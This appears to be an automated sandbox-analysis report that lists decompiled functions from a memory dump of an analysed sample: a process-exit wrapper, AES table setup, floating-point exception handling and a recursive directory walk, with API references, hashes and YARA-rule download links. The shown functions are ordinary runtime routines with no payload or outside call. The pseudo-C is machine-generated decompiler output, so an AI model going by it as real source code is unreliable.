Function 6F31F416, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F31F416(int _a4) {
				void* _t14;

				if(E6F3214AE(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E6F31F49B(_t14, _a4);
				ExitProcess(_a4);
			}

0x6f31f423
0x6f31f43f
0x6f31f43f
0x6f31f448
0x6f31f451

APIs

GetCurrentProcess.KERNEL32(?,?,6F31F415,?,00000001,?,?), ref: 6F31F438
TerminateProcess.KERNEL32(00000000,?,6F31F415,?,00000001,?,?), ref: 6F31F43F
ExitProcess.KERNEL32 ref: 6F31F451

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5100e492cba8fe3efcb2b75856dc8d2cadf10557cc58def9d1a73c55ad0bf364
Instruction ID: f1dd3ce3a5c5c3acb9897f20f1f5ce21338e7669c859e598fd21c21d77c8b59c
Opcode Fuzzy Hash: 5100e492cba8fe3efcb2b75856dc8d2cadf10557cc58def9d1a73c55ad0bf364
Instruction Fuzzy Hash: 75E0EC31508A08BFCF15AF64C908A483B7DFF45661B108419F8499A560CF36E9A2DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6F319F20, Relevance: 2.7, Strings: 2, Instructions: 163
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E6F319F20() {
				signed int _v8;
				signed int _v12;
				intOrPtr _v980;
				intOrPtr _v984;
				intOrPtr _v992;
				intOrPtr _v1000;
				char _v1040;
				signed int _t86;
				unsigned int _t90;
				char _t97;
				signed int _t102;
				signed int _t108;
				signed int _t122;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				signed int _t163;
				signed int _t164;
				intOrPtr _t165;
				signed int _t167;
				signed int* _t168;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				void* _t179;

				_t167 = 1;
				_t176 = 0;
				do {
					 *(_t179 + _t176 * 4 - 0x808) = _t167;
					 *(_t179 + _t167 * 4 - 0x408) = _t176;
					asm("sbb ecx, ecx");
					_t176 = _t176 + 1;
					_t167 = ( ~(_t167 & 0x80) & 0x0000001b ^ _t167 + _t167 ^ _t167) & 0x000000ff;
				} while (_t176 < 0x100);
				_t177 = 1;
				_t168 = 0x6f35ee68;
				do {
					 *_t168 = _t177;
					asm("sbb ecx, ecx");
					_t168 =  &(_t168[1]);
					_t177 = ( ~(_t177 & 0x80) & 0x0000001b ^ _t177 + _t177) & 0x000000ff;
				} while (_t168 < 0x6f35ee90);
				_t86 = 1;
				 *0x6f35e868 = 0x63;
				 *0x6f35edcb = 0;
				_v8 = 1;
				do {
					_t122 =  *( &_v1040 - ( *(_t179 + _t86 * 4 - 0x408) << 2));
					_t90 = (_t122 >> 0x00000007 | _t122 + _t122) & 0x000000ff;
					_t125 = _t122 ^ _t90 ^ (_t90 >> 0x00000007 | _t90 + _t90) & 0x000000ff ^ ((((((_t90 >> 0x00000007 | _t90 + _t90) & 0x000000ff) >> 0x00000007 | ((_t90 >> 0x00000007 | _t90 + _t90) & 0x000000ff) + _t92) & 0x000000ff) >> 0x00000007 | ((((_t90 >> 0x00000007 | _t90 + _t90) & 0x000000ff) >> 0x00000007 | ((_t90 >> 0x00000007 | _t90 + _t90) & 0x000000ff) + _t92) & 0x000000ff) + ((((_t90 >> 0x00000007 | _t90 + _t90) & 0x000000ff) >> 0x00000007 | ((_t90 >> 0x00000007 | _t90 + _t90) & 0x000000ff) + _t92) & 0x000000ff)) ^ 0x00000063) & 0x000000ff ^ (((_t90 >> 0x00000007 | _t90 + _t90) & 0x000000ff) >> 0x00000007 | ((_t90 >> 0x00000007 | _t90 + _t90) & 0x000000ff) + _t92) & 0x000000ff;
					_t97 = _v8;
					 *(_t97 + 0x6f35e868) = _t125;
					 *((char*)(_t125 + 0x6f35ed68)) = _t97;
					_t86 = _t97 + 1;
					_v8 = _t86;
				} while (_t86 < 0x100);
				_t126 = 0xff;
				_t178 = 0;
				_v12 = 0xff;
				do {
					_t21 = _t178 + 0x6f35e868; // 0x0
					_t170 =  *_t21 & 0x000000ff;
					asm("sbb ecx, ecx");
					_t163 = (((( ~( *_t21 & 0x80) & 0x0000001b ^ _t170 + _t170) & 0x000000ff ^ _t170) << 0x00000008 ^ _t170) << 0x00000008 ^ _t170) << 0x00000008 ^ ( ~( *_t21 & 0x80) & 0x0000001b ^ _t170 + _t170) & 0x000000ff;
					 *(0x6f360290 + _t178 * 4) = _t163;
					asm("rol ecx, 0x8");
					 *(0x6f35fe90 + _t178 * 4) = _t163;
					asm("rol ecx, 0x8");
					 *(0x6f35f290 + _t178 * 4) = _t163;
					asm("rol ecx, 0x8");
					 *(0x6f35ee90 + _t178 * 4) = _t163;
					_t31 = _t178 + 0x6f35ed68; // 0x0
					_t164 =  *_t31 & 0x000000ff;
					if(_t164 == 0) {
						_t127 = 0;
						_t175 = 0;
						_v8 = 0;
						_t102 = 0;
					} else {
						_t165 =  *((intOrPtr*)(_t179 + _t164 * 4 - 0x408));
						asm("cdq");
						_t175 =  *(_t179 + (_v980 + _t165) % _t126 * 4 - 0x808);
						asm("cdq");
						_t127 =  *(_t179 + (_v1000 + _t165) % _t126 * 4 - 0x808);
						asm("cdq");
						_v8 =  *((intOrPtr*)(_t179 + (_v984 + _t165) % _v12 * 4 - 0x808));
						asm("cdq");
						_t102 =  *(_t179 + (_v992 + _t165) % 0xff * 4 - 0x808);
					}
					_t126 = 0xff;
					_t108 = ((_t102 << 0x00000008 ^ _v8) << 0x00000008 ^ _t127) << 0x00000008 ^ _t175;
					 *(0x6f35fa90 + _t178 * 4) = _t108;
					asm("rol eax, 0x8");
					 *(0x6f35f690 + _t178 * 4) = _t108;
					asm("rol eax, 0x8");
					 *(0x6f360690 + _t178 * 4) = _t108;
					asm("rol eax, 0x8");
					 *(0x6f35e968 + _t178 * 4) = _t108;
					_t178 = _t178 + 1;
				} while (_t178 < 0x100);
				return _t108;
			}

0x6f319f29
0x6f319f31
0x6f319f33
0x6f319f35
0x6f319f3e
0x6f319f4d
0x6f319f4f
0x6f319f57
0x6f319f5a
0x6f319f62
0x6f319f67
0x6f319f70
0x6f319f72
0x6f319f7e
0x6f319f80
0x6f319f88
0x6f319f8b
0x6f319f93
0x6f319f98
0x6f319f9f
0x6f319fa6
0x6f319fb0
0x6f319fc2
0x6f319fce
0x6f319fff
0x6f31a001
0x6f31a004
0x6f31a00a
0x6f31a010
0x6f31a011
0x6f31a014
0x6f31a01b
0x6f31a020
0x6f31a022
0x6f31a025
0x6f31a025
0x6f31a025
0x6f31a038
0x6f31a053
0x6f31a055
0x6f31a05c
0x6f31a05f
0x6f31a066
0x6f31a069
0x6f31a070
0x6f31a073
0x6f31a07a
0x6f31a07a
0x6f31a083
0x6f31a0df
0x6f31a0e1
0x6f31a0e3
0x6f31a0e6
0x6f31a085
0x6f31a085
0x6f31a094
0x6f31a09f
0x6f31a0a6
0x6f31a0b1
0x6f31a0b8
0x6f31a0c3
0x6f31a0d3
0x6f31a0d6
0x6f31a0d6
0x6f31a0f3
0x6f31a0fb
0x6f31a0fd
0x6f31a104
0x6f31a107
0x6f31a10e
0x6f31a111
0x6f31a118
0x6f31a11b
0x6f31a122
0x6f31a123
0x6f31a135

Strings

D5o, xrefs: 6F31A0B9
h5o, xrefs: 6F319F67

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: D5o$h5o
API String ID: 0-271438118
Opcode ID: ad25b6e61d9c538468bd323e0ae2ac01fd5fbabe4c70e60f067a821f58d0e29c
Instruction ID: 50504500084945775f207f19b121a3db494ed04254e47651462148ae9df403bf
Opcode Fuzzy Hash: ad25b6e61d9c538468bd323e0ae2ac01fd5fbabe4c70e60f067a821f58d0e29c
Instruction Fuzzy Hash: 6E5103717102248BDB5CCF68C8913A9BBE5EBCA305F4041BEE5C7C7381D6389AA5CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F326564, Relevance: 1.8, APIs: 1, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6F326564(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E6F325F8B(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E6F325EF1(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x6f326572
0x6f326579
0x6f32657e
0x6f326584
0x6f326587
0x6f32658d
0x6f326592
0x6f326597
0x6f326597
0x6f32659d
0x6f3265a2
0x6f3265a7
0x6f3265a7
0x6f3265ae
0x6f3265b3
0x6f3265b8
0x6f3265b8
0x6f3265bf
0x6f3265c4
0x6f3265c9
0x6f3265c9
0x6f3265d0
0x6f3265d5
0x6f3265da
0x6f3265da
0x6f3265e2
0x6f3265f2
0x6f326604
0x6f326616
0x6f326629
0x6f32663b
0x6f326643
0x6f326648
0x6f32664d
0x6f32664d
0x6f326654
0x6f326659
0x6f326659
0x6f326660
0x6f326665
0x6f326665
0x6f32666c
0x6f326671
0x6f326671
0x6f326678
0x6f32667d
0x6f32667d
0x6f326687
0x6f326689
0x6f3266c3
0x6f32668b
0x6f326690
0x6f3266b4
0x6f3266bc
0x6f3266b0
0x6f3266b0
0x6f3266c6
0x6f3266cd
0x6f3266cf
0x6f3266f1
0x6f3266f9
0x6f3266fc
0x6f3266fc
0x6f3266fe
0x6f3266fe
0x6f326709
0x6f32670f
0x6f326714
0x6f32671b
0x6f326755
0x6f326760
0x6f326766
0x6f326769
0x6f32676c
0x6f326778
0x6f326780
0x6f32671d
0x6f326720
0x6f32672c
0x6f326732
0x6f326738
0x6f32673b
0x6f326744
0x6f326744
0x6f326783
0x6f326791
0x6f326797
0x6f32679a
0x6f32679f
0x6f3267a1
0x6f3267a4
0x6f3267a4
0x6f3267a9
0x6f3267ab
0x6f3267ae
0x6f3267ae
0x6f3267b3
0x6f3267b5
0x6f3267b8
0x6f3267b8
0x6f3267bd
0x6f3267bf
0x6f3267c2
0x6f3267c2
0x6f3267c7
0x6f3267c9
0x6f3267c9
0x6f3267d6
0x6f3267d9
0x6f326810
0x6f3267db
0x6f3267db
0x6f3267de
0x6f326809
0x6f3267fe
0x6f3267fe
0x6f326812
0x6f32681a
0x6f32681d
0x6f32683c
0x6f326841
0x6f326841
0x6f326843
0x6f326848
0x6f326854
0x6f32684a
0x6f32684d
0x6f32684d
0x6f326859
0x6f326859
0x6f32681f
0x6f326822
0x6f326831
0x00000000
0x6f326831
0x6f326824
0x6f326827
0x6f326829
0x6f326829
0x00000000
0x6f326827
0x6f3267e0
0x6f3267e3
0x6f3267f9
0x00000000
0x6f3267f9
0x6f3267e8
0x6f3267ea
0x6f3267ea
0x6f3267e8
0x00000000
0x6f3267d9
0x6f3266d6
0x6f3266e4
0x6f3266ec
0x00000000
0x6f3266ec
0x6f3266da
0x6f3266df
0x6f3266df
0x00000000
0x6f3266da
0x6f326697
0x6f3266a5
0x6f3266ad
0x00000000
0x6f3266ad
0x6f32669b
0x6f3266a0
0x6f3266a0
0x6f32669b

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6F32655F,?,?,00000008,?,?,6F3261F3,00000000), ref: 6F326791

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: c03b0a2deca39d78a99e5e210ae4186b84c7d571e6c4c13c1420eebbc607f12f
Instruction ID: 7ed2e38096ca11de108861cf14e590ca7c351a4c3deb76175a7d6fb4f9d998ae
Opcode Fuzzy Hash: c03b0a2deca39d78a99e5e210ae4186b84c7d571e6c4c13c1420eebbc607f12f
Instruction Fuzzy Hash: F6B14731610608DFDB05CF28C596B957BE0FF46364F258699E8A9CF2A1C736E992CF40

Uniqueness

Uniqueness Score: -1.00%

Function 6F32188A, Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E6F32188A(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				union _FINDEX_INFO_LEVELS _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _v48;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				intOrPtr* _v612;
				union _FINDEX_INFO_LEVELS _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				signed int _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				signed int _v644;
				union _FINDEX_INFO_LEVELS _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				signed int _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				intOrPtr _t68;
				signed int _t73;
				signed int _t75;
				char _t77;
				signed char _t78;
				signed int _t84;
				signed int _t94;
				signed int _t97;
				union _FINDEX_INFO_LEVELS _t98;
				intOrPtr* _t106;
				signed int _t109;
				intOrPtr _t117;
				signed int _t119;
				signed int _t122;
				signed int _t124;
				void* _t127;
				union _FINDEX_INFO_LEVELS _t128;
				intOrPtr* _t131;
				intOrPtr* _t134;
				signed int _t136;
				intOrPtr* _t139;
				signed int _t144;
				signed int _t150;
				void* _t156;
				void* _t157;
				signed int _t160;
				intOrPtr _t162;
				void* _t167;
				void* _t168;
				signed int _t170;
				signed int _t173;
				void* _t174;
				signed int _t175;
				void* _t176;
				void* _t177;

				_push(__ecx);
				_t134 = _a4;
				_t2 = _t134 + 1; // 0x1
				_t156 = _t2;
				do {
					_t68 =  *_t134;
					_t134 = _t134 + 1;
				} while (_t68 != 0);
				_push(__edi);
				_t160 = _a12;
				_t136 = _t134 - _t156 + 1;
				_v8 = _t136;
				if(_t136 <=  !_t160) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t160 + 1; // 0x1
					_t127 = _t5 + _t136;
					_t167 = E6F3201B7(_t136, _t127, 1);
					__eflags = _t160;
					if(_t160 == 0) {
						L7:
						_push(_v8);
						_t127 = _t127 - _t160;
						_t73 = E6F324A43(_t167 + _t160, _t127, _a4);
						_t175 = _t174 + 0x10;
						__eflags = _t73;
						if(_t73 != 0) {
							goto L12;
						} else {
							_t131 = _a16;
							_t119 = E6F321C8B(_t131);
							_v8 = _t119;
							__eflags = _t119;
							if(_t119 == 0) {
								 *( *(_t131 + 4)) = _t167;
								_t170 = 0;
								_t14 = _t131 + 4;
								 *_t14 =  *(_t131 + 4) + 4;
								__eflags =  *_t14;
							} else {
								E6F31FEFF(_t167);
								_t170 = _v8;
							}
							E6F31FEFF(0);
							_t122 = _t170;
							goto L4;
						}
					} else {
						_push(_t160);
						_t124 = E6F324A43(_t167, _t127, _a8);
						_t175 = _t174 + 0x10;
						__eflags = _t124;
						if(_t124 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E6F3200F7();
							asm("int3");
							_t173 = _t175;
							_t176 = _t175 - 0x298;
							_t75 =  *0x6f34609c; // 0x206de7d6
							_v48 = _t75 ^ _t173;
							_t139 = _v32;
							_t157 = _v28;
							_push(_t127);
							_push(0);
							_t162 = _v36;
							_v648 = _t157;
							__eflags = _t139 - _t162;
							if(_t139 != _t162) {
								while(1) {
									_t117 =  *_t139;
									__eflags = _t117 - 0x2f;
									if(_t117 == 0x2f) {
										break;
									}
									__eflags = _t117 - 0x5c;
									if(_t117 != 0x5c) {
										__eflags = _t117 - 0x3a;
										if(_t117 != 0x3a) {
											_t139 = E6F324A90(_t162, _t139);
											__eflags = _t139 - _t162;
											if(_t139 != _t162) {
												continue;
											}
										}
									}
									break;
								}
								_t157 = _v612;
							}
							_t77 =  *_t139;
							_v605 = _t77;
							__eflags = _t77 - 0x3a;
							if(_t77 != 0x3a) {
								L23:
								_t128 = 0;
								__eflags = _t77 - 0x2f;
								if(__eflags == 0) {
									L26:
									_t78 = 1;
								} else {
									__eflags = _t77 - 0x5c;
									if(__eflags == 0) {
										goto L26;
									} else {
										__eflags = _t77 - 0x3a;
										_t78 = 0;
										if(__eflags == 0) {
											goto L26;
										}
									}
								}
								_v672 = _t128;
								_v668 = _t128;
								_push(_t167);
								asm("sbb eax, eax");
								_v664 = _t128;
								_v660 = _t128;
								_v640 =  ~(_t78 & 0x000000ff) & _t139 - _t162 + 0x00000001;
								_v656 = _t128;
								_v652 = _t128;
								_t84 = E6F32167A(_t139 - _t162 + 1, _t162,  &_v672, E6F321B96(_t157, __eflags));
								_t177 = _t176 + 0xc;
								asm("sbb eax, eax");
								_t168 = FindFirstFileExW( !( ~_t84) & _v664, _t128,  &_v604, _t128, _t128, _t128);
								__eflags = _t168 - 0xffffffff;
								if(_t168 != 0xffffffff) {
									_t144 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
									__eflags = _t144;
									_t145 = _t144 >> 2;
									_v644 = _t144 >> 2;
									do {
										_v636 = _t128;
										_v632 = _t128;
										_v628 = _t128;
										_v624 = _t128;
										_v620 = _t128;
										_v616 = _t128;
										_t94 = E6F3215AB( &(_v604.cFileName),  &_v636,  &_v605, E6F321B96(_t157, __eflags));
										_t177 = _t177 + 0x10;
										asm("sbb eax, eax");
										_t97 =  !( ~_t94) & _v628;
										__eflags =  *_t97 - 0x2e;
										if( *_t97 != 0x2e) {
											L34:
											_push(_v612);
											_t98 = E6F32188A(_t128, _t145, _t162, _t168, _t97, _t162, _v640);
											_t177 = _t177 + 0x10;
											_v648 = _t98;
											__eflags = _t98;
											if(_t98 != 0) {
												__eflags = _v616 - _t128;
												if(_v616 != _t128) {
													E6F31FEFF(_v628);
													_t98 = _v648;
												}
												_t128 = _t98;
											} else {
												goto L35;
											}
										} else {
											_t145 =  *((intOrPtr*)(_t97 + 1));
											__eflags = _t145;
											if(_t145 == 0) {
												goto L35;
											} else {
												__eflags = _t145 - 0x2e;
												if(_t145 != 0x2e) {
													goto L34;
												} else {
													__eflags =  *((intOrPtr*)(_t97 + 2)) - _t128;
													if( *((intOrPtr*)(_t97 + 2)) == _t128) {
														goto L35;
													} else {
														goto L34;
													}
												}
											}
										}
										L43:
										FindClose(_t168);
										goto L44;
										L35:
										__eflags = _v616 - _t128;
										if(_v616 != _t128) {
											E6F31FEFF(_v628);
											_pop(_t145);
										}
										__eflags = FindNextFileW(_t168,  &_v604);
									} while (__eflags != 0);
									_t106 = _v612;
									_t150 = _v644;
									_t158 =  *_t106;
									_t109 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 2;
									__eflags = _t150 - _t109;
									if(_t150 != _t109) {
										E6F31EB90(_t128, _t162, _t168, _t158 + _t150 * 4, _t109 - _t150, 4, E6F3214E1);
									}
									goto L43;
								} else {
									_push(_v612);
									_t128 = E6F32188A(_t128,  &_v604, _t162, _t168, _t162, _t128, _t128);
								}
								L44:
								__eflags = _v652;
								if(_v652 != 0) {
									E6F31FEFF(_v664);
								}
							} else {
								__eflags = _t139 - _t162 + 1;
								if(_t139 == _t162 + 1) {
									_t77 = _v605;
									goto L23;
								} else {
									_push(_t157);
									E6F32188A(0, _t139, _t162, _t167, _t162, 0, 0);
								}
							}
							__eflags = _v12 ^ _t173;
							return E6F31C65E(_v12 ^ _t173);
						} else {
							goto L7;
						}
					}
				} else {
					_t122 = 0xc;
					L4:
					return _t122;
				}
			}

0x6f32188f
0x6f321890
0x6f321893
0x6f321893
0x6f321896
0x6f321896
0x6f321898
0x6f321899
0x6f32189d
0x6f32189e
0x6f3218a5
0x6f3218a8
0x6f3218ad
0x6f3218b7
0x6f3218b8
0x6f3218b9
0x6f3218bc
0x6f3218c6
0x6f3218ca
0x6f3218cc
0x6f3218e0
0x6f3218e0
0x6f3218e3
0x6f3218ed
0x6f3218f2
0x6f3218f5
0x6f3218f7
0x00000000
0x6f3218f9
0x6f3218f9
0x6f3218fe
0x6f321905
0x6f321908
0x6f32190a
0x6f32191b
0x6f32191d
0x6f32191f
0x6f32191f
0x6f32191f
0x6f32190c
0x6f32190d
0x6f321912
0x6f321915
0x6f321924
0x6f32192a
0x00000000
0x6f32192d
0x6f3218ce
0x6f3218ce
0x6f3218d4
0x6f3218d9
0x6f3218dc
0x6f3218de
0x6f321930
0x6f321932
0x6f321933
0x6f321934
0x6f321935
0x6f321936
0x6f321937
0x6f32193c
0x6f321940
0x6f321942
0x6f321948
0x6f32194f
0x6f321952
0x6f321955
0x6f321958
0x6f321959
0x6f32195a
0x6f32195d
0x6f321963
0x6f321965
0x6f321967
0x6f321967
0x6f321969
0x6f32196b
0x00000000
0x00000000
0x6f32196d
0x6f32196f
0x6f321971
0x6f321973
0x6f32197e
0x6f321980
0x6f321982
0x00000000
0x00000000
0x6f321982
0x6f321973
0x00000000
0x6f32196f
0x6f321984
0x6f321984
0x6f32198a
0x6f32198c
0x6f321992
0x6f321994
0x6f3219b6
0x6f3219b6
0x6f3219b8
0x6f3219ba
0x6f3219c6
0x6f3219c6
0x6f3219bc
0x6f3219bc
0x6f3219be
0x00000000
0x6f3219c0
0x6f3219c0
0x6f3219c2
0x6f3219c4
0x00000000
0x00000000
0x6f3219c4
0x6f3219be
0x6f3219ce
0x6f3219d6
0x6f3219dc
0x6f3219dd
0x6f3219df
0x6f3219e7
0x6f3219ed
0x6f3219f3
0x6f3219f9
0x6f321a0d
0x6f321a12
0x6f321a1d
0x6f321a33
0x6f321a35
0x6f321a38
